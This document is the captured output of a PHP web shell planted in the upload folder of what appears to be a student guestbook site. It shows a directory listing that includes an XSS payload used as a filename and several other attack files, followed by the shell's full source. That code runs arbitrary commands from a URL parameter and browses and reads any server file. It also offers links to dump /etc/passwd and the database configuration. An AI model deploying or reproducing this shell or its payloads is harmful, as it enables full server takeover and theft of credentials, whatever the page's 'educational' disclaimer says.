🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./webshell.php

<?php
// Advanced PHP shell for demonstration
echo "<h1 style='background: black; color: lime; padding: 10px;'>🐚 WEB SHELL ACTIVATED</h1>";

if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    echo "<h2>Executing: " . htmlspecialchars($cmd) . "</h2>";
    echo "<pre style='background: #000; color: #0f0; padding: 10px; border-radius: 5px;'>";
    
    // Try different command execution methods
    if (function_exists('system')) {
        system($cmd);
    } elseif (function_exists('exec')) {
        exec($cmd, $output);
        echo implode("\n", $output);
    } elseif (function_exists('shell_exec')) {
        echo shell_exec($cmd);
    } elseif (function_exists('passthru')) {
        passthru($cmd);
    } else {
        echo "No command execution functions available.";
    }
    echo "</pre>";
}

// File browser
echo "<h2>📁 File Browser</h2>";
$dir = isset($_GET['dir']) ? $_GET['dir'] : '.';
$files = scandir($dir);

echo "<p>Current directory: <code>" . realpath($dir) . "</code></p>";
echo "<div style='background: #f5f5f5; padding: 10px; border-radius: 5px;'>";

foreach ($files as $file) {
    if ($file === '.') continue;
    $fullPath = $dir . '/' . $file;
    
    if (is_dir($fullPath)) {
        echo "📁 <a href='?dir=" . urlencode($fullPath) . "'>" . htmlspecialchars($file) . "</a><br>";
    } else {
        echo "📄 " . htmlspecialchars($file);
        if (is_readable($fullPath)) {
            echo " <a href='?view=" . urlencode($fullPath) . "'>[view]</a>";
        }
        echo "<br>";
    }
}
echo "</div>";

// File viewer
if (isset($_GET['view'])) {
    $file = $_GET['view'];
    if (is_readable($file)) {
        echo "<h2>📄 Viewing: " . htmlspecialchars($file) . "</h2>";
        echo "<pre style='background: #f9f9f9; padding: 10px; border: 1px solid #ddd; max-height: 400px; overflow: auto;'>";
        echo htmlspecialchars(file_get_contents($file));
        echo "</pre>";
    }
}
?>

<h2>🎯 Available Actions</h2>
<div style="background: #e9ecef; padding: 15px; border-radius: 8px;">
    <h3>Command Execution:</h3>
    <form>
        <input type="text" name="cmd" placeholder="Enter command (e.g., ls, whoami, pwd)" style="width: 300px; padding: 5px;">
        <button type="submit">Execute</button>
    </form>
    
    <h3>Quick Commands:</h3>
    <a href="?cmd=ls -la">📋 List files</a> | 
    <a href="?cmd=whoami">👤 Show user</a> | 
    <a href="?cmd=pwd">📍 Show directory</a> | 
    <a href="?cmd=ps aux">🔄 Show processes</a> | 
    <a href="?cmd=cat /etc/passwd">🔐 Show users</a>
    
    <h3>File Operations:</h3>
    <a href="?dir=..">⬆️ Parent directory</a> | 
    <a href="?dir=/">🏠 Root directory</a> | 
    <a href="?view=../config/Database.php">🔍 View DB config</a>
</div>

<div style="margin-top: 20px; padding: 10px; background: #fff3cd; border-radius: 5px;">
    <strong>⚠️ Educational Warning:</strong> This demonstrates a web shell vulnerability. 
    In a real attack, this could allow complete server compromise!
</div>
